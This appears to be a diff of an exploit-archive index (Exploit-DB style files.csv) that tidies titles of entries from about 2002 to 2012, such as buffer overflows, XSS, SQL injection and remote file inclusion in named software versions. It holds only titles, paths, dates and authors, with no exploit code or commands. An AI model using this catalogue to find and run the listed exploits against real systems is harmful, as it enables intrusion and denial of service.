-21812,platforms/windows/remote/21812.txt,"MS Word 95/97/98/2000/2002 INCLUDEPICTURE Document Sharing File Disclosure",2002-09-20,"Richard Edwards",windows,remote,0 +21812,platforms/windows/remote/21812.txt,"Microsoft Word 95/97/98/2000/2002 INCLUDEPICTURE Document Sharing File Disclosure",2002-09-20,"Richard Edwards",windows,remote,0 21813,platforms/windows/dos/21813.c,"Trillian 0.73/0.74 IRC JOIN Buffer Overflow Vulnerability",2002-09-20,"Lance Fitz-Herbert",windows,dos,0 21814,platforms/linux/local/21814.c,"Alsaplayer 0.99.71 Local Buffer Overflow Vulnerablity",2002-09-20,zillion,linux,local,0 21815,platforms/osx/local/21815.txt,"Apple Mac OS X 10.2 Terminal.APP Telnet Link Command Execution Vulnerability",2002-09-21,"Taiyo Fujii",osx,local,0 @@ -19092,7 +19092,7 @@ id,file,description,date,author,platform,type,port 21853,platforms/unix/remote/21853.txt,"Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability",2002-09-24,"Rossen Raykov",unix,remote,0 21854,platforms/linux/dos/21854.c,"Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability",2002-09-24,"K.C. Wong",linux,dos,0 21855,platforms/php/webapps/21855.txt,"PHPNuke 6.0/6.5 Search Form Cross-Site Scripting Vulnerability",2002-09-24,"Mark Grimes",php,webapps,0 -21856,platforms/multiple/local/21856.txt,"OpenVMS 5.3/6.2/7.x UCX POP Server Arbitrary File Modification Vulnerability",2002-09-25,"Mike Riley",multiple,local,0 +21856,platforms/multiple/local/21856.txt,"OpenVms 5.3/6.2/7.x UCX POP Server Arbitrary File Modification Vulnerability",2002-09-25,"Mike Riley",multiple,local,0 21857,platforms/linux/remote/21857.pl,"Monkey HTTP Server 0.1.4 File Disclosure Vulnerability",2002-09-25,DownBload,linux,remote,0 21858,platforms/linux/remote/21858.txt,"ACWeb 1.14/1.8 Cross-Site Scripting Vulnerability",2002-09-25,DownBload,linux,remote,0 21859,platforms/php/webapps/21859.txt,"PHPNuke 6.0 News Message HTML Injection Vulnerability",2002-09-25,das@hush.com,php,webapps,0 @@ -19142,9 +19142,9 @@ id,file,description,date,author,platform,type,port 21904,platforms/aix/local/21904.pl,"IBM AIX 4.3.x/5.1 ERRPT Local Buffer Overflow Vulnerability",2003-04-16,watercloud,aix,local,0 21905,platforms/php/webapps/21905.txt,"phpMyNewsLetter 0.6.10 Remote File Include Vulnerability",2002-10-03,frog,php,webapps,0 21906,platforms/php/webapps/21906.txt,"phpLinkat 0.1 - Multiple Cross Site Scripting Vulnerabilities",2002-10-04,Sp.IC,php,webapps,0 -21907,platforms/windows/dos/21907.c,"Cooolsoft PowerFTP Server 2.x Remote Denial of Service Vulnerability (1)",2002-10-05,Morgan,windows,dos,0 -21908,platforms/windows/dos/21908.pl,"Cooolsoft PowerFTP Server 2.x Remote Denial of Service Vulnerability (2)",2002-10-05,subj,windows,dos,0 -21909,platforms/windows/dos/21909.txt,"Cooolsoft PowerFTP Server 2.x Remote Denial of Service Vulnerability (3)",2002-10-05,p0pt4rtz,windows,dos,0 +21907,platforms/windows/dos/21907.c,"Cooolsoft PowerFTP Server 2.x - Remote Denial of Service Vulnerability (1)",2002-10-05,Morgan,windows,dos,0 +21908,platforms/windows/dos/21908.pl,"Cooolsoft PowerFTP Server 2.x - Remote Denial of Service Vulnerability (2)",2002-10-05,subj,windows,dos,0 +21909,platforms/windows/dos/21909.txt,"Cooolsoft PowerFTP Server 2.x - Remote Denial of Service Vulnerability (3)",2002-10-05,p0pt4rtz,windows,dos,0 21910,platforms/windows/remote/21910.txt,"Microsoft IIS 5.0 IDC Extension Cross Site Scripting Vulnerability",2002-10-05,Roberto,windows,remote,0 21911,platforms/multiple/dos/21911.txt,"Oracle 9i Application Server 9.0.2 Web Cache Administration Tool Denial of Service Vulnerability",2002-10-06,@stake,multiple,dos,0 21912,platforms/php/webapps/21912.txt,"Killer Protection 1.0 Information Disclosure Vulnerability",2002-10-07,frog,php,webapps,0 @@ -19172,13 +19172,13 @@ id,file,description,date,author,platform,type,port 21937,platforms/linux/remote/21937.c,"ghttpd 1.4.x Log() Function Buffer Overflow Vulnerability",2002-10-07,flea,linux,remote,0 21938,platforms/windows/dos/21938.txt,"TelCondex SimpleWebServer 2.0.6 - Denial of Service Vulnerability",2002-10-15,"Marc Ruef",windows,dos,0 21939,platforms/hardware/dos/21939.txt,"Polycom ViaVideo 2.2/3.0 - Denial of Service Vulnerability",2002-10-15,prophecy.net.nz,hardware,dos,0 -21940,platforms/windows/remote/21940.txt,"MS Internet Explorer 5/6 Unauthorized Document Object Model Access Vulnerability",2002-10-15,"GreyMagic Software",windows,remote,0 +21940,platforms/windows/remote/21940.txt,"Microsoft Internet Explorer 5/6 Unauthorized Document Object Model Access Vulnerability",2002-10-15,"GreyMagic Software",windows,remote,0 21941,platforms/windows/dos/21941.txt,"Polycom 2.2/3.0 ViaVideo Buffer Overflow Vulnerability",2002-10-15,prophecy.net.nz,windows,dos,0 21942,platforms/multiple/remote/21942.java,"Ingenium Learning Management System 5.1/6.1 Reversible Password Hash Weakness",2002-10-15,"Brian Enigma",multiple,remote,0 21943,platforms/windows/dos/21943.c,"Zone Labs ZoneAlarm 3.0/3.1 Syn Flood Denial of Service Vulnerability",2002-10-16,"Abraham Lincoln",windows,dos,0 21944,platforms/hardware/remote/21944.pl,"Cisco CatOS 5.x/6.1/7.3/7.4 CiscoView HTTP Server Buffer Overflow Vulnerability",2002-10-16,blackangels,hardware,remote,0 21945,platforms/linux/remote/21945.pl,"PlanetDNS PlanetWeb 1.14 Malformed Request Remote Buffer Overflow Vulnerability",2002-10-17,"securma massine",linux,remote,0 -21946,platforms/java/webapps/21946.txt,"VBulletin 2.0/2.2.x Cross Site Scripting Vulnerabilities",2002-10-18,Sp.IC,java,webapps,0 +21946,platforms/java/webapps/21946.txt,"VBulletin 2.0/2.2.x - Cross Site Scripting Vulnerabilities",2002-10-18,Sp.IC,java,webapps,0 21947,platforms/unix/remote/21947.txt,"IBM Websphere Edge Server 3.6/4.0 Cross Site Scripting Vulnerability",2002-10-23,Rapid7,unix,remote,0 21948,platforms/unix/remote/21948.txt,"IBM Websphere Edge Server 3.69/4.0 HTTP Header Injection Vulnerability",2002-10-23,Rapid7,unix,remote,0 21949,platforms/unix/dos/21949.txt,"IBM Websphere Caching Proxy 3.6/4.0 - Denial of Service Vulnerability",2002-10-18,Rapid7,unix,dos,0 @@ -19196,7 +19196,7 @@ id,file,description,date,author,platform,type,port 21961,platforms/php/webapps/21961.txt,"MyMarket 1.71 Form_Header.PHP Cross-Site Scripting Vulnerability",2002-10-23,qber66,php,webapps,0 21962,platforms/cgi/webapps/21962.txt,"Mojo Mail 2.7 Email Form Cross Site Scripting Vulnerability",2002-10-24,"Daniel Boland",cgi,webapps,0 21963,platforms/windows/dos/21963.pl,"SolarWinds TFTP Server Standard Edition 5.0.55 - Large UDP Packet Vulnerability",2002-10-24,D4rkGr3y,windows,dos,0 -21964,platforms/windows/remote/21964.txt,"Solarwinds TFTP Server Standard Edition 5.0.55 - Directory Traversal vulnerability",2002-10-25,"Matthew Murphy",windows,remote,0 +21964,platforms/windows/remote/21964.txt,"Solarwinds TFTP Server Standard Edition 5.0.55 - Directory Traversal Vulnerability",2002-10-25,"Matthew Murphy",windows,remote,0 21965,platforms/windows/dos/21965.txt,"Alt-N MDaemon 6.0.x POP Server Buffer Overflow Vulnerability",2002-10-28,D4rkGr3y,windows,dos,0 21966,platforms/cgi/webapps/21966.txt,"MailReader.com 2.3.x NPH-MR.CGI File Disclosure Vulnerability",2002-10-28,pokleyzz,cgi,webapps,0 21967,platforms/php/webapps/21967.txt,"Benjamin Lefevre Dobermann Forum 0.x entete.php subpath Parameter Remote File Inclusion",2002-10-28,frog,php,webapps,0 @@ -19248,8 +19248,8 @@ id,file,description,date,author,platform,type,port 22015,platforms/cgi/webapps/22015.txt,"W3Mail 1.0.6 File Disclosure Vulnerability",2002-11-12,"Tim Brown",cgi,webapps,0 22016,platforms/linux/remote/22016.c,"LibHTTPD 1.2 POST Buffer Overflow Vulnerability",2002-11-13,Xpl017Elz,linux,remote,0 22017,platforms/php/webapps/22017.txt,"PHPBB Advanced Quick Reply Hack 1.0/1.1 - Remote File Include Vulnerability",2002-11-13,"Hai Nam Luke",php,webapps,0 -22018,platforms/windows/remote/22018.pl,"keyfocus kf web server 1.0.8 - Directory Traversal vulnerability",2002-11-13,mattmurphy,windows,remote,0 -22019,platforms/windows/dos/22019.pl,"IISPop 1.161/1.181 Remote Buffer Overflow Denial of Service Vulnerability",2002-11-14,"securma massine",windows,dos,0 +22018,platforms/windows/remote/22018.pl,"keyfocus kf web server 1.0.8 - Directory Traversal Vulnerability",2002-11-13,mattmurphy,windows,remote,0 +22019,platforms/windows/dos/22019.pl,"IISPop 1.161/1.181 - Remote Buffer Overflow Denial of Service Vulnerability",2002-11-14,"securma massine",windows,dos,0 22020,platforms/multiple/remote/22020.pl,"Perception LiteServe 2.0 CGI Source Disclosure Vulnerability",2002-11-14,mattmurphy,multiple,remote,0 22021,platforms/linux/remote/22021.sh,"Lonerunner Zeroo HTTP Server 1.5 - Remote Buffer Overflow Vulnerability",2002-11-16,"dong-h0un U",linux,remote,0 22022,platforms/windows/remote/22022.txt,"Macromedia Flash 6.0.47 .0 SWRemote Heap Corruption Vulnerability",2002-11-18,LOM,windows,remote,0 @@ -19267,7 +19267,7 @@ id,file,description,date,author,platform,type,port 22034,platforms/linux/remote/22034.pl,"WSMP3 0.0.1/0.0.2 - Remote Heap Corruption Vulnerability (1)",2002-11-25,"Damian Myerscough",linux,remote,0 22035,platforms/linux/remote/22035.c,"WSMP3 0.0.1/0.0.2 - Remote Heap Corruption Vulnerability (2)",2002-11-25,Xpl017Elz,linux,remote,0 22036,platforms/unix/remote/22036.pl,"XFree86 X11R6 3.3.x Font Server Remote Buffer Overrun Vulnerability",2002-11-25,"TESO Security",unix,remote,0 -22037,platforms/php/webapps/22037.txt,"PHP-Nuke 5.x/6.0/6.5 BETA 1 Multiple Cross Site Scripting Vulnerabilities",2002-11-25,"Matthew Murphy",php,webapps,0 +22037,platforms/php/webapps/22037.txt,"PHP-Nuke 5.x/6.0/6.5 BETA 1 - Multiple Cross Site Scripting Vulnerabilities",2002-11-25,"Matthew Murphy",php,webapps,0 22038,platforms/php/webapps/22038.txt,"Sisfokol 4.0 - Arbitrary File Upload",2012-10-17,"cr4wl3r ",php,webapps,0 22039,platforms/php/webapps/22039.txt,"symphony cms 2.3 - Multiple Vulnerabilities",2012-10-17,Wireghoul,php,webapps,0 22040,platforms/jsp/webapps/22040.txt,"ManageEngine Support Center Plus <= 7908 - Multiple Vulnerabilities",2012-10-17,xistence,jsp,webapps,0 @@ -19293,14 +19293,14 @@ id,file,description,date,author,platform,type,port 22060,platforms/hardware/dos/22060.txt,"3Com SuperStack 3 NBX 4.0/4.1 FTPD Denial of Service Vulnerability",2002-12-02,"Michael S. Scheidell",hardware,dos,0 22061,platforms/linux/dos/22061.txt,"Cyrus IMAPD 1.4/1.5.19/2.0.12/2.0.16/2.1.9/2.1.10 Pre-Login Heap Corruption Vulnerability",2002-12-02,"Timo Sirainen",linux,dos,0 22062,platforms/hardware/dos/22062.py,"Linksys Devices 1.42/1.43 GET Request Buffer Overflow Vulnerability",2002-12-03,"Core Security",hardware,dos,0 -22063,platforms/linux/remote/22063.c,"zeroo http server 1.5 - Directory Traversal vulnerability (1)",2002-11-22,mikecc,linux,remote,0 -22064,platforms/linux/remote/22064.pl,"zeroo http server 1.5 - Directory Traversal vulnerability (2)",2002-11-22,mattmurphy,linux,remote,0 +22063,platforms/linux/remote/22063.c,"zeroo http server 1.5 - Directory Traversal Vulnerability (1)",2002-11-22,mikecc,linux,remote,0 +22064,platforms/linux/remote/22064.pl,"zeroo http server 1.5 - Directory Traversal Vulnerability (2)",2002-11-22,mattmurphy,linux,remote,0 22065,platforms/php/webapps/22065.html,"phpBB 2.0.3 search.php Cross Site Scripting Vulnerability",2002-12-03,f_a_a,php,webapps,0 22066,platforms/linux/local/22066.c,"Exim Internet Mailer 3.35/3.36/4.10 Format String Vulnerability",2002-12-04,"Thomas Wana",linux,local,0 22067,platforms/unix/local/22067.txt,"SAP DB 7.3 .00 Symbolic Link Vulnerability",2002-12-04,"SAP Security",unix,local,0 22068,platforms/unix/dos/22068.pl,"Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability",2002-12-04,Sapient2003,unix,dos,0 22069,platforms/multiple/local/22069.py,"Oracle Database Authentication Protocol Security Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0 -22070,platforms/windows/webapps/22070.py,"otrs 3.1 - Stored XSS vulnerability",2012-10-18,"Mike Eduard",windows,webapps,0 +22070,platforms/windows/webapps/22070.py,"otrs 3.1 - Stored XSS Vulnerability",2012-10-18,"Mike Eduard",windows,webapps,0 22071,platforms/php/webapps/22071.txt,"FireStorm Professional Real Estate Wordpress Plugin 2.06.01 SQL Injection Vulnerability",2012-10-18,"Ashiyane Digital Security Team",php,webapps,0 22072,platforms/linux/remote/22072.c,"Cobalt RaQ4 Administrative Interface Command Execution Vulnerability",2002-12-05,grazer,linux,remote,0 22073,platforms/php/webapps/22073.txt,"APBoard 2.0 2 Unauthorized Thread Reading Vulnerability",2002-12-06,"DNA ESC",php,webapps,0 @@ -19323,12 +19323,12 @@ id,file,description,date,author,platform,type,port 22090,platforms/php/webapps/22090.txt,"PHP-Nuke 6.0 Web Mail Script Injection Vulnerability",2002-12-16,"Ulf Harnhammar",php,webapps,0 22091,platforms/linux/remote/22091.c,"zkfingerd SysLog 0.9.1 Format String Vulnerability",2002-12-16,"Marceta Milos",linux,remote,0 22092,platforms/multiple/webapps/22092.py,"ManageEngine Security Manager Plus <= 5.5 build 5505 Path Traversal",2012-10-19,xistence,multiple,webapps,0 -22093,platforms/multiple/remote/22093.py,"ManageEngine Security Manager Plus <= 5.5 build 5505 Remote SYSTEM/root SQLi",2012-10-19,xistence,multiple,remote,0 -22094,platforms/windows/remote/22094.rb,"ManageEngine Security Manager Plus <= 5.5 build 5505 Remote SYSTEM SQLi (MSF)",2012-10-19,xistence,windows,remote,0 +22093,platforms/multiple/remote/22093.py,"ManageEngine Security Manager Plus <= 5.5 build 5505 - Remote SYSTEM/root SQLi",2012-10-19,xistence,multiple,remote,0 +22094,platforms/windows/remote/22094.rb,"ManageEngine Security Manager Plus <= 5.5 build 5505 - Remote SYSTEM SQLi (MSF)",2012-10-19,xistence,windows,remote,0 22097,platforms/php/webapps/22097.txt,"Joomla Freestyle Support 1.9.1.1447 (com_fss) SQL Injection",2012-10-19,D4NB4R,php,webapps,0 22098,platforms/php/webapps/22098.txt,"Joomla Tags (index.php, tag parameter) SQL Injection",2012-10-19,D4NB4R,php,webapps,0 22099,platforms/php/webapps/22099.txt,"CMSQLITE 1.3.2 - Multiple Vulnerabiltiies",2012-10-19,Vulnerability-Lab,php,webapps,0 -22100,platforms/windows/dos/22100.txt,"Internet Explorer 9 XSS Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos,0 +22100,platforms/windows/dos/22100.txt,"Internet Explorer 9 - XSS Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos,0 22101,platforms/linux/remote/22101.c,"zkfingerd 0.9.1 say() Format String Vulnerability",2002-12-16,"Marceta Milos",linux,remote,0 22102,platforms/php/webapps/22102.txt,"PHP-Nuke 6.0 - Multiple Path Disclosure Vulnerabilities",2002-12-16,frog,php,webapps,0 22103,platforms/php/webapps/22103.txt,"PHP-Nuke 6.0 - Multiple Cross Site Scripting Vulnerabilities",2002-12-16,frog,php,webapps,0 @@ -19347,17 +19347,17 @@ id,file,description,date,author,platform,type,port 22116,platforms/php/webapps/22116.txt,"N/X Web Content Management System 2002 Prerelease 1 datasets.php c_path Parameter LFI",2003-01-02,frog,php,webapps,0 22117,platforms/windows/dos/22117.txt,"iCal 3.7 Malformed HTTP Request Denial of Service Vulnerability",2003-01-03,"securma massine",windows,dos,0 22118,platforms/windows/dos/22118.txt,"iCal 3.7 - Remote Buffer Overflow Vulnerability",2003-01-03,"securma massine",windows,dos,0 -22119,platforms/windows/dos/22119.html,"Microsoft Pocket Internet Explorer 3.0 - Denial of Service Vulnerability",2003-01-03,"Christopher Sogge Røtnes",windows,dos,0 +22119,platforms/windows/dos/22119.html,"Microsoft PoCket Internet Explorer 3.0 - Denial of Service Vulnerability",2003-01-03,"Christopher Sogge Røtnes",windows,dos,0 22120,platforms/solaris/local/22120.c,"Sun Solaris 2.5.1/2.6/7.0/8/9 Wall Spoofed Message Origin Vulnerability",2003-01-03,"Brant Roman",solaris,local,0 22121,platforms/windows/dos/22121.pl,"EType EServ 2.9x FTP Remote Denial of Service Vulnerability",2003-01-04,D4rkGr3y,windows,dos,0 -22122,platforms/windows/dos/22122.pl,"EType EServ 2.9x POP3 Remote Denial of Service Vulnerability",2003-01-04,D4rkGr3y,windows,dos,0 +22122,platforms/windows/dos/22122.pl,"EType EServ 2.9x POP3 - Remote Denial of Service Vulnerability",2003-01-04,D4rkGr3y,windows,dos,0 22123,platforms/windows/dos/22123.pl,"EType EServ 2.9x SMTP Remote Denial of Service Vulnerability",2003-01-04,D4rkGr3y,windows,dos,0 22124,platforms/windows/dos/22124.pl,"EType EServ 1.9x NNTP Remote Denial of Service Vulnerability",2003-01-04,D4rkGr3y,windows,dos,0 22125,platforms/php/webapps/22125.txt,"OpenTopic 2.3.1 Private Message HTML Injection Vulnerability",2003-01-06,frog,php,webapps,0 22126,platforms/php/webapps/22126.txt,"DCP-Portal 5.0.1 editor.php root Parameter Remote File Inclusion",2003-01-06,frog,php,webapps,0 22127,platforms/php/webapps/22127.txt,"DCP-Portal 5.0.1 lib.php root Parameter Remote File Inclusion",2003-01-06,frog,php,webapps,0 22128,platforms/linux/local/22128.c,"H-Sphere Webshell 2.4 - Local Root Exploit",2003-01-06,"Carl Livitt",linux,local,0 -22129,platforms/linux/remote/22129.c,"H-Sphere Webshell 2.4 remote root exploit",2003-01-06,"Carl Livitt",linux,remote,0 +22129,platforms/linux/remote/22129.c,"H-Sphere Webshell 2.4 - Remote root Exploit",2003-01-06,"Carl Livitt",linux,remote,0 22130,platforms/multiple/remote/22130.txt,"AN HTTPD 1.41 e Cross Site Scripting Vulnerability",2003-01-06,D4rkGr3y,multiple,remote,0 22131,platforms/unix/remote/22131.pl,"Linux Kernel 2.0.x/2.2.x/2.4.x,FreeBSD 4.x Network Device Driver Frame Padding Information Disclosure",2007-03-23,"Jon Hart",unix,remote,0 22132,platforms/windows/dos/22132.txt,"Microsoft Windows XP/2000 Fontview Denial of Service Vulnerability",2003-01-06,andrew,windows,dos,0 @@ -19415,14 +19415,14 @@ id,file,description,date,author,platform,type,port 22184,platforms/windows/remote/22184.pl,"GlobalScape CuteFTP 5.0 LIST Response Buffer Overflow Vulnerability",2003-03-26,snooq,windows,remote,0 22185,platforms/windows/remote/22185.txt,"Sambar Server 5.x results.stm Cross Site Scripting Vulnerability",2003-01-20,galiarept,windows,remote,0 22186,platforms/php/webapps/22186.txt,"MyRoom 3.5 GOLD save_item.php Arbitrary File Upload Vulnerability",2003-01-20,frog,php,webapps,0 -22187,platforms/linux/remote/22187.txt,"CVS 1.11.x Directory Request Double Free Heap Corruption Vulnerability",2003-01-20,"Stefan Esser",linux,remote,0 +22187,platforms/linux/remote/22187.txt,"CVS 1.11.x - Directory Request Double Free Heap Corruption Vulnerability",2003-01-20,"Stefan Esser",linux,remote,0 22189,platforms/linux/local/22189.txt,"MTink 0.9.x Printer Status Monitor Environment Variable Buffer Overflow Vulnerability",2003-01-21,"Karol Wiesek",linux,local,0 22190,platforms/linux/local/22190.txt,"ESCPUtil 1.15.2 2 Local Printer Name Buffer Overflow Vulnerability",2003-01-21,"Karol Wiesek",linux,local,0 -22191,platforms/linux/dos/22191.pl,"Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability",2003-01-22,"Matthew Murphy",linux,dos,0 +22191,platforms/linux/dos/22191.pl,"Apache Web Server 2.0.x - MS-DOS Device Name Denial of Service Vulnerability",2003-01-22,"Matthew Murphy",linux,dos,0 22192,platforms/php/webapps/22192.pl,"YABB SE 0.8/1.4/1.5 Packages.PHP Remote File Include Vulnerability",2003-01-22,spabam,php,webapps,0 22193,platforms/windows/local/22193.txt,"WinRAR 2.90/3.0/3.10 Archive File Extension Buffer Overrun Vulnerability",2003-01-22,nesumin,windows,local,0 22194,platforms/windows/remote/22194.txt,"Microsoft Windows XP/2000/NT 4 Locator Service Buffer Overflow Vulnerability",2003-01-22,"David Litchfield",windows,remote,0 -22195,platforms/php/webapps/22195.txt,"PHPOutsourcing Zorum 3.x Remote Include Command Execution Vulnerability",2003-01-22,MGhz,php,webapps,0 +22195,platforms/php/webapps/22195.txt,"PHPOutsourcing Zorum 3.x - Remote Include Command Execution Vulnerability",2003-01-22,MGhz,php,webapps,0 22196,platforms/windows/dos/22196.txt,"Rediff Bol 2.0.2 URL Handling Denial of Service Vulnerability",2003-01-23,"S G Masood",windows,dos,0 22197,platforms/linux/dos/22197.txt,"slocate 2.5/2.6 - Local Buffer Overrun Vulnerability",2003-01-24,"USG team",linux,dos,0 22198,platforms/cgi/webapps/22198.txt,"GNU Mailman 2.1 'email' Cross Site Scripting Vulnerability",2003-01-24,webmaster@procheckup.com,cgi,webapps,0 @@ -19433,9 +19433,9 @@ id,file,description,date,author,platform,type,port 22203,platforms/solaris/local/22203.txt,"Sun Solaris 2.5/2.6/7.0/8/9 AT Command Arbitrary File Deletion Vulnerability",2003-01-27,"Wojciech Purczynski",solaris,local,0 22204,platforms/cgi/webapps/22204.txt,"MultiHTML 1.5 File Disclosure Vulnerability",2000-09-13,"Niels Heinen",cgi,webapps,0 22205,platforms/linux/remote/22205.txt,"Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability",2003-01-26,"Jouko Pynnönen",linux,remote,0 -22206,platforms/php/webapps/22206.txt,"Nukebrowser 2.x Remote File Include Vulnerability",2003-01-30,Havenard,php,webapps,0 +22206,platforms/php/webapps/22206.txt,"Nukebrowser 2.x - Remote File Include Vulnerability",2003-01-30,Havenard,php,webapps,0 22207,platforms/multiple/dos/22207.txt,"3ware Disk Managment 1.10 Malformed HTTP Request DoS Vulnerability",2003-01-30,"Nathan Neulinger",multiple,dos,0 -22208,platforms/php/webapps/22208.txt,"myphpPageTool 0.4.3 -1 Remote File Include Vulnerability",2003-02-03,frog,php,webapps,0 +22208,platforms/php/webapps/22208.txt,"myphpPageTool 0.4.3 -1 - Remote File Include Vulnerability",2003-02-03,frog,php,webapps,0 22209,platforms/php/webapps/22209.txt,"phpMyShop 1.0 compte.php SQL Injection Vulnerability",2003-02-03,frog,php,webapps,0 22210,platforms/openbsd/local/22210.txt,"OpenBSD 2.x/3.x CHPass Temporary File Link File Content Revealing Vulnerability",2003-02-03,"Marc Bevand",openbsd,local,0 22211,platforms/php/webapps/22211.txt,"PHP-Nuke 5.x/6.0 Avatar HTML Injection Vulnerability",2003-02-03,delusion,php,webapps,0 @@ -19449,7 +19449,7 @@ id,file,description,date,author,platform,type,port 22219,platforms/windows/remote/22219.txt,"Opera 7.0 Error Message History Disclosure Weakness",2003-02-04,"GreyMagic Software",windows,remote,0 22220,platforms/windows/dos/22220.pl,"ByteCatcher FTP Client 1.0.4 Long Server Banner Buffer Overflow Vulnerability",2003-02-04,"Dennis Rand",windows,dos,0 22221,platforms/windows/dos/22221.pl,"Electrasoft 32Bit FTP 9.49.1 - Client Long Server Banner Buffer Overflow Vulnerability",2003-02-04,"Dennis Rand",windows,dos,0 -22222,platforms/php/webapps/22222.txt,"TOPO 1.41 Remote Path Disclosure Vulnerability",2003-02-04,"Rynho Zeros Web",php,webapps,0 +22222,platforms/php/webapps/22222.txt,"TOPO 1.41 - Remote Path Disclosure Vulnerability",2003-02-04,"Rynho Zeros Web",php,webapps,0 22223,platforms/multiple/dos/22223.txt,"Epic Games Unreal Engine 436 Client Unreal URL Denial of Service Vulnerability",2003-02-05,"Auriemma Luigi",multiple,dos,0 22224,platforms/multiple/remote/22224.txt,"Epic Games Unreal Engine 436 URL Directory Traversal Vulnerability",2003-02-05,"Auriemma Luigi",multiple,remote,0 22225,platforms/windows/local/22225.txt,"Microsoft Windows XP Redirector Privilege Escalation Vulnerability",2003-02-05,Nsfocus,windows,local,0 @@ -19479,8 +19479,8 @@ id,file,description,date,author,platform,type,port 22250,platforms/multiple/dos/22250.sh,"iParty Conferencing Server Denial of Service Vulnerability",1999-05-08,wh00t,multiple,dos,0 22251,platforms/multiple/remote/22251.sh,"AIX 3.x/4.x,Windows 95/98/2000/NT 4,SunOS 5 gethostbyname() Buffer Overflow",2006-09-28,RoMaNSoFt,multiple,remote,0 22252,platforms/php/webapps/22252.txt,"PHP-Board 1.0 User Password Disclosure Vulnerability",2003-02-15,frog,php,webapps,0 -22253,platforms/php/webapps/22253.txt,"DotBr 0.1 System.PHP3 Remote Command Execution Vulnerability",2003-02-15,frog,php,webapps,0 -22254,platforms/php/webapps/22254.txt,"DotBr 0.1 Exec.PHP3 Remote Command Execution Vulnerability",2003-02-15,frog,php,webapps,0 +22253,platforms/php/webapps/22253.txt,"DotBr 0.1 System.PHP3 - Remote Command Execution Vulnerability",2003-02-15,frog,php,webapps,0 +22254,platforms/php/webapps/22254.txt,"DotBr 0.1 Exec.PHP3 - Remote Command Execution Vulnerability",2003-02-15,frog,php,webapps,0 22255,platforms/windows/dos/22255.txt,"Microsoft Windows XP/95/98/2000/NT 4 Riched20.dll Attribute Buffer Overflow Vulnerability",2003-02-17,"Jie Dong",windows,dos,0 22256,platforms/php/webapps/22256.txt,"D-Forum 1 header Parameter Remote File Inclusion",2003-02-18,frog,php,webapps,0 22257,platforms/php/webapps/22257.txt,"D-Forum 1 footer Parameter Remote File Inclusion",2003-02-18,frog,php,webapps,0 @@ -19564,7 +19564,7 @@ id,file,description,date,author,platform,type,port 22339,platforms/php/webapps/22339.txt,"SimpleBBS 1.0.6 Users.php Insecure File Permissions Vulnerability",2003-03-07,flur,php,webapps,0 22340,platforms/linux/local/22340.txt,"MySQL 3.23.x mysqld Privilege Escalation Vulnerability",2003-03-08,bugsman@libero.it,linux,local,0 22341,platforms/windows/remote/22341.txt,"Opera 6.0/7.0 Long Filename Download Buffer Overrun Vulnerability",2003-03-10,nesumin,windows,remote,0 -22342,platforms/linux/remote/22342.c,"Qpopper 4.0.x Remote Memory Corruption Vulnerability",2003-03-10,"Florian Heinz",linux,remote,0 +22342,platforms/linux/remote/22342.c,"Qpopper 4.0.x - Remote Memory Corruption Vulnerability",2003-03-10,"Florian Heinz",linux,remote,0 22343,platforms/php/webapps/22343.txt,"VPOPMail 0.9x vpopmail.php Remote Command Execution Vulnerability",2003-03-11,ERRor,php,webapps,0 22344,platforms/linux/local/22344.txt,"Man Program 1.5 Unsafe Return Value Command Execution Vulnerability",2003-03-11,"Jack Lloyd",linux,local,0 22345,platforms/multiple/dos/22345.txt,"Multitech RouteFinder 550 Remote Memory Corruption Vulnerability",2003-03-11,"Peter Kruse",multiple,dos,0 @@ -19586,7 +19586,7 @@ id,file,description,date,author,platform,type,port 22361,platforms/linux/remote/22361.cpp,"Qpopper 3/4 Username Information Disclosure Weakness",2003-03-11,plasmahh,linux,remote,0 22362,platforms/linux/local/22362.c,"Linux Kernel 2.2.x/2.4.x Privileged Process Hijacking Vulnerability (1)",2003-03-17,anszom@v-lo.krakow.pl,linux,local,0 22363,platforms/linux/local/22363.c,"Linux Kernel 2.2.x/2.4.x Privileged Process Hijacking Vulnerability (2)",2003-04-10,"Wojciech Purczynski",linux,local,0 -22364,platforms/cgi/webapps/22364.c,"Outblaze Webmail 0 Cookie Authentication Bypass Vulnerability",2003-03-17,"dong-h0un U",cgi,webapps,0 +22364,platforms/cgi/webapps/22364.c,"Outblaze Webmail - Cookie Authentication Bypass Vulnerability",2003-03-17,"dong-h0un U",cgi,webapps,0 22365,platforms/windows/remote/22365.pl,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (1)",2003-03-24,mat,windows,remote,0 22366,platforms/windows/remote/22366.c,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (2)",2003-03-31,ThreaT,windows,remote,0 22367,platforms/windows/remote/22367.txt,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (3)",2003-04-04,"Morning Wood",windows,remote,0 @@ -19602,7 +19602,7 @@ id,file,description,date,author,platform,type,port 22377,platforms/cgi/webapps/22377.txt,"Kebi Academy 2001 Input Validation Vulnerability",2003-03-17,"dong-h0un U",cgi,webapps,0 22378,platforms/php/webapps/22378.txt,"MyAbraCadaWeb 1.0 Path Disclosure Vulnerability",2003-03-17,"gregory Le Bras",php,webapps,0 22379,platforms/linux/remote/22379.c,"PXE Server 2.0 - Remote Buffer Overrun Vulnerability",2003-03-13,CrZ,linux,remote,0 -22380,platforms/cgi/webapps/22380.pl,"Smart Search 4.25 Remote Command Execution Vulnerability",2003-01-05,knight420,cgi,webapps,0 +22380,platforms/cgi/webapps/22380.pl,"Smart Search 4.25 - Remote Command Execution Vulnerability",2003-01-05,knight420,cgi,webapps,0 22381,platforms/multiple/remote/22381.txt,"SIPS 0.2.2 User Information Disclosure Vulnerability",2003-03-18,dwcgr0up,multiple,remote,0 22382,platforms/php/webapps/22382.txt,"Mambo Site Server 4.0.10 index.php Cross Site Scripting Vulnerability",2003-03-18,"Ertan Kurt",php,webapps,0 22383,platforms/php/webapps/22383.txt,"Basit 1.0 Submit Module Cross Site Scripting 